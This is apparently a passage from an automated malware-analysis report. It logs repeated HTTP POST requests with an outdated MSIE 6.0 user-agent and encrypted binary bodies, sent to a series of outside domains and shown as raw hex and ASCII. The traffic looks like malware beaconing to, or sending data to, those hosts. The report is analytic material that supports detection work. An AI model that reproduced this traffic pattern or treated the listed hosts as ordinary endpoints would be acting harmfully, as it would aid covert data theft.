xHchj5176v+QPXcm1MjsutYt4KJLY+CAIaaJJuylrGSCEndcFHMQitkohqbamA7VceErHYOMtZlBTm+/kbFQWUqvNybEeujR9GTXy1wIM00b2vpANDjsMds5e00rAZ8hph5+NK8r7JY/eOdFgAiPyXz/62oLlPwNGg7bIZ17CraN0ff1E4RQgt+x8aHkuYSzmY2sWMwHskN+nGfRPdz1jxi+77ypr4s/Pib8HpbZk5GnXYmQH+kN+n8QZKTm5lqRBV4xMPsf9f12wuua4WpsLV/wI2994cppVp9hD+e50nwFZ+lRIN4pPai9b15xoJVxuB1854/UU6vwBgTAs7N93nQcEBQf8z23US0WewJ0e6mZHTPkvEVbuXLsp6ZF/dplMOyNbUIBEyS7Xnu/sl+K/ZwehPBfnfENq8YGcdjJYkJ5FffUNpornKugJLbEVSL5b1ZOuagpsMbfpzNFvgQ0SwJXli/gSLRd5i1O7G8BKeaUnVaPj0pUSWDfHUi9nGj2y2jkAJ3neeBnv+L72QOS8OGU/+xZS/u0rCeIx2R8KaXPmgxyNUEnosHYOp+Qp00Nsqm+
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 61 51 47 52 6a 6d 63 58 2b 2f 2f 53 2b 77 62 49 46 69 32 52 6b 44 43 69 41 2b 44 64 38 7a 71 7a 69 79 48 2b 36 4e 53 4e 36 74 39 37 75 58 6e 4d 50 57 49 44 64 68 44 68 68 5a 43 2f 49 75 55 65 74 69 75 65 6f 5a 46 66 4a 65 70 41 59 56 4e 42 59 65 34 53 52 71 44 2f 31 38 53 41 41 37 4f 51 70 45 54 62 55 31 39 74 42 53 74 4d 41 48 62 33 42 39 4e 57 51 4e 63 2b 73 4f 66 52 77 4d 4f 35 68 41 51 45 76 45 69 49 59 45 78 58 42 69 55 41 4c 53 4d 4e 70 6f 50 61 74 54 59 79 6f 4b 73 75 35 36 7a 41 76 50 74 38 47 79 65 32 6e 55 6f 68 70 66 6d 32 64 41 47 2b 58 32 4f 74 2b 74 44 30 4a 49 49 77 30 50 69 62 77 36 72 41 4d 4a 44 72 6f 47 71 4b 2f 4c 57 79 55 69 44 58 4f 44 4d 5a 50 54 44 45 70 68 6b 42 4b 6a 5a 54 63 53 78 71 5a 42 6f 56 63 2b 49 54 64 72 78 6b 63 46 2b 54 43 41 56 43 53 4a 67 7a 75 66 70 4d 6f 5a 31 4c 34 50 43 5a 73 42 42 69 45 65 61 6a 68 59 33 34 56 77 6b 62 54 48 44 4a 72 2b 4c 31 36 71 53 6a 76 64 64 43 6a 33 63 47 2b 56 4c 58 71 54 41 6c 68 79 4c 50 71 6c 52 55 39 59 57 39 6c 50 6f 6b 37 6b 49 77 62 4d 30 63 37 5a 4e 41 47 6e 68 35 65 72 4a 35 77 42 5a 59 4b 74 78 6d 54 42 61 66 46 30 79 76 59 4c 52 7a 6f 64 61 4e 7a 4f 36 63 49 57 64 4a 67 41 74 79 6c 64 4d 50 4c 72 59 56 35 72 73 43 72 63 38 44 4f 45 53 52 73 6f 63 67 6d 45 74 48 34 5a 32 54 67 45 4a 62 65 42 57 48 6f 74 32 54 45 61 72 54 78 76 6b 62 38 78 48 45 59 30 36 36 50 47 4f 35 45 4b 31 63 37 47 76 61 38 4f 67 48 79 53 67 54 48 32 37 56 49 76 64 6e 4d 5a 44 4c 35 47 78 33 2b 76 63 4e 2f 61 61 56 49 46 65 43 57 59 2f 47 4a 6b 48 57 7a 33 43 41 4b 36 64 4b 37 67 4a 4a 4d 63 5a 77 37 71 35 67 4f 53 66 2f 46 70 34 66 78 39 46 6d 4a 6e 39 6c 44 4d 36 47 77 56 78 6b 61 4a 79 43 48 4a 54 4a 6f 75 73 58 77 78 4a 31 74 48 46 74 49 48 76 49 54 48 6f 4c 70 53 66 59 4c 46 5a 6a 46 6c 78 74 7a 67 3d 3d Data Ascii: aQGRjmcX+//S+wbIFi2RkDCiA+Dd8zqziyH+6NSN6t97uXnMPWIDdhDhhZC/IuUetiueoZFfJepAYVNBYe4SRqD/18SAA7OQpETbU19tBStMAHb3B9NWQNc+sOfRwMO5hAQEvEiIYExXBiUALSMNpoPatTYyoKsu56zAvPt8Gye2nUohpfm2dAG+X2Ot+tD0JIIw0Pibw6rAMJDroGqK/LWyUiDXODMZPTDEphkBKjZTcSxqZBoVc+ITdrxkcF+TCAVCSJgzufpMoZ1L4PCZsBBiEeajhY34VwkbTHDJr+L16qSjvddCj3cG+VLXqTAlhyLPqlRU9YW9lPok7kIwbM0c7ZNAGnh5erJ5wBZYKtxmTBafF0yvYLRzodaNzO6cIWdJgAtyldMPLrYV5rsCrc8DOESRsocgmEtH4Z2TgEJbeBWHot2TEarTxvkb8xHEY066PGO5EK1c7Gva8OgHySgTH27VIvdnMZDL5Gx3+vcN/aaVIFeCWY/GJkHWz3CAK6dK7gJJMcZw7q5gOSf/Fp4fx9FmJn9lDM6GwVxkaJyCHJTJousXwxJ1tHFtIHvITHoLpSfYLFZjFlxtzg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheData Raw: 78 7a 33 62 6b 63 55 79 2b 2f 2b 6f 4b 78 56 74 37 41 57 6f 52 7a 35 37 65 31 69 54 58 53 72 45 79 58 4d 74 50 33 7a 68 43 32 77 46 56 72 33 53 66 39 64 54 72 7a 77 49 78 63 61 50 50 78 59 78 47 52 42 64 50 77 53 35 63 63 52 57 75 61 50 78 63 41 42 6a 78 78 73 62 2f 71 76 56 51 6e 6e 6c 45 75 50 53 58 47 53 56 64 62 6f 70 79 31 5a 66 47 4d 76 55 63 46 76 33 5a 57 52 44 38 41 35 5a 76 52 36 2b 4a 4a 4b 72 58 36 38 66 6c 44 5a 6b 4c 78 68 74 58 4c 41 50 78 2b 36 53 5a 6c 57 31 33 44 6b 47 2b 32 68 42 32 73 63 6c 6e 6e 6c 54 53 67 6f 6d 79 6e 67 63 6a 49 72 30 44 44 54 64 44 53 61 35 7a 49 71 68 6d 45 52 6c 62 62 55 77 6b 77 54 70 59 47 72 61 4f 35 50 45 54 31 41 74 4c 35 32 4d 72 53 70 39 4b 6a 65 41 54 78 50 5a 43 4d 4d 67 6b 54 4f 45 44 42 66 73 4c 4e 71 78 77 70 4d 56 66 39 35 6e 74 38 32 63 6e 4f 77 4b 6e 6a 58 71 56 61 55 4c 37 36 42 34 70 34 6b 63 73 6c 70 73 46 43 33 34 59 72 57 58 78 43 65 52 51 5a 58 50 42 75 38 43 62 66 4c 51 52 4f 70 49 6b 2b 73 66 44 51 47 57 54 53 6c 54 49 50 74 4d 4f 4d 74 79 37 6c 57 5a 75 39 49 78 71 2f 4e 74 36 52 4e 45 77 51 49 37 6f 62 77 6b 63 73 35 2f 4b 54 49 37 32 58 4d 73 54 34 4b 49 66 65 69 56 6b 4b 44 33 68 6e 67 36 2f 62 7a 52 68 34 79 53 6f 5a 58 2b 69 51 76 48 41 75 37 49 5a 50 62 59 57 58 65 50 6f 61 59 48 56 2b 55 53 4c 32 44 52 74 5a 66 52 70 64 4b 7a 69 6c 44 52 71 4a 72 68 63 4e 31 6b 31 7a 71 6f 67 75 44 49 4a 42 74 64 2f 41 47 6c 34 2b 2f 72 4f 69 7a 6e 72 66 46 69 4c 45 42 75 64 4d 6a 41 61 74 51 76 53 6d 61 42 63 56 74 69 6d 44 6d 55 6a 6a 55 56 2b 57 48 31 4a 4f 54 4d 61 76 47 4f 69 2f 53 4e 32 57 76 45 6c 53 70 69 58 52 69 49 74 33 6f 34 2b 77 51 54 65 54 55 3d Data Ascii: xz3bkcUy+/+oKxVt7AWoRz57e1iTXSrEyXMtP3zhC2wFVr3Sf9dTrzwIxcaPPxYxGRBdPwS5ccRWuaPxcABjxxsb/qvVQnnlEuPSXGSVdbopy1ZfGMvUcFv3ZWRD8A5ZvR6+JJKrX68flDZkLxhtXLAPx+6SZlW13DkG+2hB2sclnnlTSgomyngcjIr0DDTdDSa5zIqhmERlbbUwkwTpYGraO5PET1AtL52MrSp9KjeATxPZCMMgkTOEDBfsLNqxwpMVf95nt82cnOwKnjXqVaUL76B4p4kcslpsFC34YrWXxCeRQZXPBu8CbfLQROpIk+sfDQGWTSlTIPtMOMty7lWZu9Ixq/Nt6RNEwQI7obwkcs5/KTI72XMsT4KIfeiVkKD3hng6/bzRh4ySoZX+iQvHAu7IZPbYWXePoaYHV+USL2DRtZfRpdKzilDRqJrhcN1k1zqoguDIJBtd/AGl4+/rOiznrfFiLEBudMjAatQvSmaBcVtimDmUjjUV+WH1JOTMavGOi/SN2WvElSpiXRiIt3o4+wQTeTU=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 31 49 2f 57 77 31 53 52 32 2f 2f 6f 65 6f 49 37 4c 38 79 77 35 36 64 4c 33 57 33 4d 76 44 6b 74 79 4d 73 74 57 32 36 75 79 6d 6f 6b 75 6f 64 73 76 63 6a 75 48 30 4c 32 36 71 57 4f 78 36 73 48 58 46 45 70 7a 39 7a 61 77 35 46 4c 47 57 39 4f 42 56 63 57 79 57 70 77 49 35 33 38 65 59 55 63 76 55 62 32 78 5a 2f 6e 6e 31 47 72 71 43 71 65 74 37 49 39 32 47 73 53 62 31 43 65 47 77 5a 31 6f 64 6f 36 7a 54 61 55 37 67 63 76 59 73 4e 72 48 6e 66 72 38 4b 65 42 75 30 33 48 2b 78 71 4e 47 54 41 62 5a 67 31 31 4a 65 46 44 68 39 65 59 78 70 6a 39 77 46 46 61 66 55 36 53 74 54 2f 48 62 7a 31 53 4e 52 34 45 64 74 30 46 31 37 53 36 61 5a 57 34 6b 53 7a 43 38 61 51 6a 55 4b 62 41 49 43 33 65 68 4c 78 35 30 4e 41 70 41 48 35 2f 48 5a 54 32 67 50 6b 39 77 72 74 30 31 4e 58 6b 74 4a 6a 33 47 66 34 38 49 57 4d 69 38 61 2b 58 4b 78 50 59 68 57 32 6d 36 42 52 58 32 67 52 48 6c 39 69 4c 39 77 63 75 64 36 6a 4d 6b 4d 6a 33 35 4f 41 65 78 51 72 69 77 64 39 71 6d 32 39 32 52 2b 51 31 6f 66 70 6b 72 2f 33 61 61 32 30 69 6a 65 4a 33 6e 6a 6d 52 74 33 67 76 72 52 35 36 4a 67 76 69 79 6a 71 57 65 41 45 64 57 4b 48 48 43 43 72 65 6d 31 4a 44 2f 65 53 56 32 6e 38 4e 73 4f 76 6c 32 59 79 76 69 79 70 36 74 38 34 35 59 5a 44 52 62 4b 74 5a 4d 4e 76 79 30 39 4f 73 6d 31 58 4c 70 30 58 52 68 41 6d 38 59 72 59 63 6a 52 34 38 6a 43 72 62 74 49 4e 50 4e 61 49 4f 50 35 53 4a 69 47 4a 68 6e 69 57 6f 71 44 75 4e 46 34 69 70 61 77 48 79 66 4f 4e 6a 41 4b 44 4c 4e 73 47 7a 43 4c 71 63 57 58 46 4a 48 6c 79 42 71 44 4c 4f 54 6d 71 61 48 34 67 2b 48 2b 44 52 77 77 75 32 71 37 65 39 64 57 55 39 61 46 59 53 48 31 44 48 37 6f 39 4c 6a 55 36 7a 48 41 45 71 58 56 63 3d Data Ascii: 1I/Ww1SR2//oeoI7L8yw56dL3W3MvDktyMstW26uymokuodsvcjuH0L26qWOx6sHXFEpz9zaw5FLGW9OBVcWyWpwI538eYUcvUb2xZ/nn1GrqCqet7I92GsSb1CeGwZ1odo6zTaU7gcvYsNrHnfr8KeBu03H+xqNGTAbZg11JeFDh9eYxpj9wFFafU6StT/Hbz1SNR4Edt0F17S6aZW4kSzC8aQjUKbAIC3ehLx50NApAH5/HZT2gPk9wrt01NXktJj3Gf48IWMi8a+XKxPYhW2m6BRX2gRHl9iL9wcud6jMkMj35OAexQriwd9qm292R+Q1ofpkr/3aa20ijeJ3njmRt3gvrR56JgviyjqWeAEdWKHHCCrem1JD/eSV2n8NsOvl2Yyviyp6t845YZDRbKtZMNvy09Osm1XLp0XRhAm8YrYcjR48jCrbtINPNaIOP5SJiGJhniWoqDuNF4ipawHyfONjAKDLNsGzCLqcWXFJHlyBqDLOTmqaH4g+H+DRwwu2q7e9dWU9aFYSH1DH7o9LjU6zHAEqXVc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 46 2f 6e 69 6b 44 61 4b 36 76 39 6b 53 47 34 50 6b 58 79 76 4c 64 6e 4d 6f 4a 68 57 37 42 74 43 79 76 45 4f 65 33 38 64 30 5a 58 31 4d 6c 72 4e 37 75 4f 47 62 54 55 77 45 4d 6a 55 30 76 50 73 41 4e 6a 42 73 37 49 45 6a 53 34 56 57 53 54 36 75 45 79 46 36 38 59 32 34 4c 6b 39 52 75 47 62 6a 4f 53 70 54 58 45 71 53 46 56 77 73 35 37 6e 71 77 43 73 71 70 37 79 55 4e 6d 7a 6b 53 6a 66 56 32 6b 45 2f 68 58 32 55 34 70 72 57 52 76 66 51 78 4e 45 79 73 62 59 58 67 79 52 61 6b 66 46 6d 69 62 37 35 66 4b 6a 33 66 4f 48 47 4c 6c 4b 56 4b 33 6c 36 69 75 6f 75 78 57 62 4a 6d 36 61 58 6b 33 72 75 50 33 59 2f 61 6f 4e 2f 53 35 55 6b 66 30 6f 31 74 2f 57 34 46 52 74 74 48 67 33 4b 79 2f 78 55 4f 30 52 61 55 72 35 58 74 50 38 75 65 77 45 38 61 77 73 50 74 6e 36 67 42 4f 45 4e 7a 33 70 71 6c 76 79 58 75 35 31 31 73 4b 65 51 34 62 30 6a 41 50 52 56 79 41 75 78 72 6e 77 49 43 4b 4e 72 32 67 36 4d 53 57 6d 6d 45 54 63 48 74 36 6e 68 39 64 6e 77 58 30 75 77 45 51 78 6f 76 53 4b 49 74 55 76 65 44 67 4b 66 71 69 31 45 69 6e 46 79 49 67 59 6a 58 53 69 76 39 59 4c 52 6f 35 37 4e 35 44 77 4e 65 35 66 72 6b 51 4f 4f 61 50 2b 4e 44 59 36 66 65 64 55 63 6f 4b 49 69 32 73 63 6e 47 6c 6b 6c 73 55 54 70 6d 74 39 42 45 73 45 63 64 34 35 48 49 6f 31 64 65 34 4d 44 33 62 6f 7a 5a 45 42 42 4e 37 59 4e 2b 5a 63 56 6d 32 5a 6d 4c 34 2f 42 77 70 6f 33 46 72 38 66 72 41 52 62 45 56 4d 6a 69 67 6e 77 49 58 63 2f 36 75 54 77 30 4a 6a 74 65 31 34 44 41 45 4d 4f 6d 32 74 66 58 77 79 2f 44 39 70 4b 68 74 56 49 48 46 76 43 73 65 51 50 59 2f 35 54 6f 76 2b 79 4d 42 74 58 63 67 30 5a 70 2f 52 38 31 46 68 68 70 55 41 6b 49 45 55 48 6c 57 55 2b 2b 57 48 74 37 6e 42 4c 44 69 58 70 2b 45 61 58 62 4c 42 58 69 5a 59 75 62 6f 4f 55 44 48 41 34 45 2b 68 6d 68 39 71 76 4b 59 3d Data Ascii: F/nikDaK6v9kSG4PkXyvLdnMoJhW7BtCyvEOe38d0ZX1MlrN7uOGbTUwEMjU0vPsANjBs7IEjS4VWST6uEyF68Y24Lk9RuGbjOSpTXEqSFVws57nqwCsqp7yUNmzkSjfV2kE/hX2U4prWRvfQxNEysbYXgyRakfFmib75fKj3fOHGLlKVK3l6iuouxWbJm6aXk3ruP3Y/aoN/S5Ukf0o1t/W4FRttHg3Ky/xUO0RaUr5XtP8uewE8awsPtn6gBOENz3pqlvyXu511sKeQ4b0jAPRVyAuxrnwICKNr2g6MSWmmETcHt6nh9dnwX0uwEQxovSKItUveDgKfqi1EinFyIgYjXSiv9YLRo57N5DwNe5frkQOOaP+NDY6fedUcoKIi2scnGlklsUTpmt9BEsEcd45HIo1de4MD3bozZEBBN7YN+ZcVm2ZmL4/Bwpo3Fr8frARbEVMjignwIXc/6uTw0Jjte14DAEMOm2tfXwy/D9pKhtVIHFvCseQPY/5Tov+yMBtXcg0Zp/R81FhhpUAkIEUHlWU++WHt7nBLDiXp+EaXbLBXiZYuboOUDHA4E+hmh9qvKY=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 4e 75 77 5a 6f 50 4a 59 38 2f 38 77 4c 6f 66 43 4a 65 50 63 34 50 58 61 33 4f 58 43 52 2b 73 57 52 72 5a 7a 78 56 4f 78 77 74 47 55 6f 6e 43 74 31 45 49 78 48 45 69 77 71 56 49 52 70 33 38 4e 6a 45 6d 59 78 30 48 61 65 4b 45 44 53 77 42 79 71 59 65 34 5a 6a 70 4f 42 4e 34 2f 38 66 33 4a 38 55 2f 42 6e 4e 5a 77 48 75 45 7a 47 61 2f 34 45 35 75 6f 33 39 49 74 6f 49 46 63 36 41 70 4d 2b 63 6b 41 6a 78 7a 32 73 57 2f 57 38 72 63 35 57 57 4e 78 50 6c 37 30 70 54 2f 2f 36 51 6c 41 57 6b 35 49 77 57 6a 33 44 30 35 41 37 6b 45 57 73 45 4f 77 43 37 6d 37 56 7a 59 6e 37 4a 6e 6a 6b 61 50 36 7a 6a 4f 36 35 38 36 55 4e 69 76 6f 6f 6c 63 37 41 41 4d 43 78 45 2b 4e 45 34 43 34 4a 45 54 75 42 66 59 61 50 33 43 39 65 32 63 47 7a 6d 6c 69 49 4b 48 49 67 30 69 31 61 6b 46 70 72 4d 37 74 69 32 52 54 37 6e 4c 66 72 37 59 58 6e 33 57 34 48 6e 6a 36 46 72 65 2f 75 6f 53 75 45 69 59 38 35 4d 6e 44 43 30 66 57 38 64 65 72 57 56 47 5a 6b 63 58 4e 31 78 76 62 6b 6e 6a 43 59 66 70 39 39 6c 73 4c 62 4d 68 58 38 77 78 47 6c 4e 37 68 6d 4e 31 51 45 6f 35 4d 32 63 74 44 65 43 6d 68 76 6a 69 33 4a 49 79 36 6b 61 4a 36 77 79 64 6b 4f 71 6f 2b 45 64 45 2f 50 6d 78 6b 64 56 6b 37 45 59 5a 70 77 68 53 6b 6f 45 70 6e 68 46 4a 75 72 44 5a 64 4f 4b 34 58 4f 55 2b 49 35 39 6e 75 4c 72 38 4e 44 47 4b 57 71 69 37 65 47 4d 4d 31 5a 45 70 59 57 69 6c 4b 52 48 79 48 71 6f 47 63 2b 5a 74 54 76 75 4b 70 43 41 62 6b 56 70 41 52 51 68 72 38 69 79 47 7a 62 65 6d 75 33 71 64 63 77 75 53 48 75 72 59 53 65 51 58 43 46 76 4e 46 38 71 2f 53 55 52 74 65 55 6e 62 4a 38 49 64 53 54 64 79 72 47 69 4b 54 4a 4d 4e 70 74 43 4b 76 6d 38 2b 45 5a 4f 77 42 41 6d 4c 35 6c 61 31 4c 52 2b 7a 67 69 32 73 70 49 66 53 49 35 46 6d 2b 6a 41 32 74 37 2f 36 66 Data Ascii: NuwZoPJY8/8wLofCJePc4PXa3OXCR+sWRrZzxVOxwtGUonCt1EIxHEiwqVIRp38NjEmYx0HaeKEDSwByqYe4ZjpOBN4/8f3J8U/BnNZwHuEzGa/4E5uo39ItoIFc6ApM+ckAjxz2sW/W8rc5WWNxPl70pT//6QlAWk5IwWj3D05A7kEWsEOwC7m7VzYn7JnjkaP6zjO6586UNivoolc7AAMCxE+NE4C4JETuBfYaP3C9e2cGzmliIKHIg0i1akFprM7ti2RT7nLfr7YXn3W4Hnj6Fre/uoSuEiY85MnDC0fW8derWVGZkcXN1xvbknjCYfp99lsLbMhX8wxGlN7hmN1QEo5M2ctDeCmhvji3JIy6kaJ6wydkOqo+EdE/PmxkdVk7EYZpwhSkoEpnhFJurDZdOK4XOU+I59nuLr8NDGKWqi7eGMM1ZEpYWilKRHyHqoGc+ZtTvuKpCAbkVpARQhr8iyGzbemu3qdcwuSHurYSeQXCFvNF8q/SURteUnbJ8IdSTdyrGiKTJMNptCKvm8+EZOwBAmL5la1LR+zgi2spIfSI5Fm+jA2t7/6f
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 78 48 63 68 6a 35 31 37 36 76 2b 51 50 58 63 6d 31 4d 6a 73 75 74 59 74 34 4b 4a 4c 59 2b 43 41 49 61 61 4a 4a 75 79 6c 72 47 53 43 45 6e 64 63 46 48 4d 51 69 74 6b 6f 68 71 62 61 6d 41 37 56 63 65 45 72 48 59 4f 4d 74 5a 6c 42 54 6d 2b 2f 6b 62 46 51 57 55 71 76 4e 79 62 45 65 75 6a 52 39 47 54 58 79 31 77 49 4d 30 30 62 32 76 70 41 4e 44 6a 73 4d 64 73 35 65 30 30 72 41 5a 38 68 70 68 35 2b 4e 4b 38 72 37 4a 59 2f 65 4f 64 46 67 41 69 50 79 58 7a 2f 36 32 6f 4c 6c 50 77 4e 47 67 37 62 49 5a 31 37 43 72 61 4e 30 66 66 31 45 34 52 51 67 74 2b 78 38 61 48 6b 75 59 53 7a 6d 59 32 73 57 4d 77 48 73 6b 4e 2b 6e 47 66 52 50 64 7a 31 6a 78 69 2b 37 37 79 70 72 34 73 2f 50 69 62 38 48 70 62 5a 6b 35 47 6e 58 59 6d 51 48 2b 6b 4e 2b 6e 38 51 5a 4b 54 6d 35 6c 71 52 42 56 34 78 4d 50 73 66 39 66 31 32 77 75 75 61 34 57 70 73 4c 56 2f 77 49 32 39 39 34 63 70 70 56 70 39 68 44 2b 65 35 30 6e 77 46 5a 2b 6c 52 49 4e 34 70 50 61 69 39 62 31 35 78 6f 4a 56 78 75 42 31 38 35 34 2f 55 55 36 76 77 42 67 54 41 73 37 4e 39 33 6e 51 63 45 42 51 66 38 7a 32 33 55 53 30 57 65 77 4a 30 65 36 6d 5a 48 54 50 6b 76 45 56 62 75 58 4c 73 70 36 5a 46 2f 64 70 6c 4d 4f 79 4e 62 55 49 42 45 79 53 37 58 6e 75 2f 73 6c 2b 4b 2f 5a 77 65 68 50 42 66 6e 66 45 4e 71 38 59 47 63 64 6a 4a 59 6b 4a 35 46 66 66 55 4e 70 6f 72 6e 4b 75 67 4a 4c 62 45 56 53 4c 35 62 31 5a 4f 75 61 67 70 73 4d 62 66 70 7a 4e 46 76 67 51 30 53 77 4a 58 6c 69 2f 67 53 4c 52 64 35 69 31 4f 37 47 38 42 4b 65 61 55 6e 56 61 50 6a 30 70 55 53 57 44 66 48 55 69 39 6e 47 6a 32 79 32 6a 6b 41 4a 33 6e 65 65 42 6e 76 2b 4c 37 32 51 4f 53 38 4f 47 55 2f 2b 78 5a 53 2f 75 30 72 43 65 49 78 32 52 38 4b 61 58 50 6d 67 78 79 4e 55 45 6e 6f 73 48 59 4f 70 2b 51 70 30 30 4e 73 71 6d 2b Data Ascii: xHchj5176v+QPXcm1MjsutYt4KJLY+CAIaaJJuylrGSCEndcFHMQitkohqbamA7VceErHYOMtZlBTm+/kbFQWUqvNybEeujR9GTXy1wIM00b2vpANDjsMds5e00rAZ8hph5+NK8r7JY/eOdFgAiPyXz/62oLlPwNGg7bIZ17CraN0ff1E4RQgt+x8aHkuYSzmY2sWMwHskN+nGfRPdz1jxi+77ypr4s/Pib8HpbZk5GnXYmQH+kN+n8QZKTm5lqRBV4xMPsf9f12wuua4WpsLV/wI2994cppVp9hD+e50nwFZ+lRIN4pPai9b15xoJVxuB1854/UU6vwBgTAs7N93nQcEBQf8z23US0WewJ0e6mZHTPkvEVbuXLsp6ZF/dplMOyNbUIBEyS7Xnu/sl+K/ZwehPBfnfENq8YGcdjJYkJ5FffUNpornKugJLbEVSL5b1ZOuagpsMbfpzNFvgQ0SwJXli/gSLRd5i1O7G8BKeaUnVaPj0pUSWDfHUi9nGj2y2jkAJ3neeBnv+L72QOS8OGU/+xZS/u0rCeIx2R8KaXPmgxyNUEnosHYOp+Qp00Nsqm+
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 64 68 6c 61 47 53 79 5a 2f 2f 2f 32 6e 2f 4a 5a 46 30 4b 39 43 44 38 56 75 4a 65 45 76 52 69 50 49 47 33 42 50 78 45 30 56 44 76 6e 49 6b 6a 42 71 73 4e 61 38 6f 6a 68 70 6f 67 6c 68 65 53 79 38 4d 39 43 49 74 76 31 2f 4d 73 38 53 6b 7a 45 5a 53 33 72 59 56 79 6b 31 49 69 76 51 34 4e 7a 76 6a 68 46 58 62 30 71 65 32 6c 70 68 30 56 41 70 75 72 6a 67 48 68 75 5a 58 50 43 72 79 50 37 59 66 62 76 6e 6e 6f 69 52 48 4a 44 64 63 65 48 58 56 65 56 79 4a 7a 50 48 65 56 57 68 48 64 4e 61 4a 4d 54 76 72 35 2b 73 59 72 51 54 54 5a 35 4c 64 68 6e 77 76 6d 44 4b 61 50 4b 51 34 44 67 41 48 4e 32 73 71 39 42 76 46 67 45 43 58 39 59 33 30 6f 53 53 77 4d 46 4c 59 34 45 31 77 68 33 4e 35 50 64 43 54 64 7a 39 44 79 4f 41 50 70 79 4b 31 7a 63 68 2f 6c 73 38 79 78 57 31 6b 4b 58 38 4c 69 70 32 63 6e 32 76 45 49 47 73 4c 6d 74 43 76 59 59 73 68 52 4b 46 54 39 63 37 33 35 35 4a 41 73 71 35 43 41 39 6d 58 73 43 55 6f 6c 6a 36 72 43 61 39 6e 65 41 6e 4a 68 4d 47 45 71 52 5a 46 37 35 6d 69 31 39 51 50 74 41 78 76 30 46 34 69 78 64 34 55 31 6e 56 2b 59 36 72 6f 2b 36 55 46 61 4b 4d 6d 72 72 7a 50 38 4f 75 55 6d 46 67 65 50 43 4e 32 2b 62 49 4d 32 65 4a 2f 6e 49 64 43 78 5a 46 76 68 4a 6c 46 6b 4b 4b 31 73 6d 42 64 32 77 6f 32 53 62 30 45 6e 64 62 36 54 47 57 6b 46 54 77 72 49 67 7a 79 74 53 4b 66 48 4a 6b 31 78 2b 52 55 32 66 44 65 6e 7a 7a 41 53 74 46 46 45 6d 59 66 35 35 2b 42 67 33 6e 62 62 69 7a 42 65 45 68 54 4a 31 6e 55 61 71 39 53 44 61 36 4b 50 37 2b 36 2b 72 52 5a 41 77 30 50 73 6a 30 32 54 4d 64 68 33 66 74 50 38 2f 45 77 63 74 61 6a 2f 75 79 75 2b 46 30 4c 30 75 58 73 6d 4c 48 71 59 48 6b 52 65 35 34 50 69 69 45 2f 46 78 42 44 6e 53 52 41 3d 3d Data Ascii: dhlaGSyZ///2n/JZF0K9CD8VuJeEvRiPIG3BPxE0VDvnIkjBqsNa8ojhpoglheSy8M9CItv1/Ms8SkzEZS3rYVyk1IivQ4NzvjhFXb0qe2lph0VApurjgHhuZXPCryP7YfbvnnoiRHJDdceHXVeVyJzPHeVWhHdNaJMTvr5+sYrQTTZ5LdhnwvmDKaPKQ4DgAHN2sq9BvFgECX9Y30oSSwMFLY4E1wh3N5PdCTdz9DyOAPpyK1zch/ls8yxW1kKX8Lip2cn2vEIGsLmtCvYYshRKFT9c7355JAsq5CA9mXsCUolj6rCa9neAnJhMGEqRZF75mi19QPtAxv0F4ixd4U1nV+Y6ro+6UFaKMmrrzP8OuUmFgePCN2+bIM2eJ/nIdCxZFvhJlFkKK1smBd2wo2Sb0Endb6TGWkFTwrIgzytSKfHJk1x+RU2fDenzzAStFFEmYf55+Bg3nbbizBeEhTJ1nUaq9SDa6KP7+6+rRZAw0Psj02TMdh3ftP8/Ewctaj/uyu+F0L0uXsmLHqYHkRe54PiiE/FxBDnSRA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 4a 79 63 50 57 67 45 39 43 77 42 36 46 66 51 39 34 48 4a 6f 72 4e 72 49 33 38 64 2f 36 67 4a 64 78 57 50 62 73 37 58 70 39 48 67 4e 68 52 48 73 76 46 74 32 46 61 62 6f 4d 32 42 6f 64 38 78 31 45 59 66 7a 2f 36 30 2b 36 44 6f 47 31 39 30 63 4a 71 67 52 45 35 55 48 70 63 37 66 6a 43 77 35 56 34 35 53 63 5a 61 4f 76 78 48 79 39 6a 44 6f 37 75 5a 43 45 6b 65 6b 4d 45 70 61 37 4c 50 35 6f 6f 32 75 68 45 7a 44 5a 38 7a 63 38 79 30 50 75 4a 75 34 67 78 34 77 45 4c 57 34 6a 58 41 37 55 79 55 69 50 4e 76 31 78 75 43 6b 42 61 36 6e 6d 30 6a 41 55 4b 42 4d 7a 5a 50 76 70 55 6e 75 78 6a 4d 4b 67 49 4b 77 76 45 50 54 47 59 42 6e 31 39 54 39 45 48 78 51 50 36 53 50 35 5a 43 6f 7a 37 4a 67 7a 75 36 6c 4a 77 53 44 30 2b 50 49 46 32 4e 7a 6a 53 6e 62 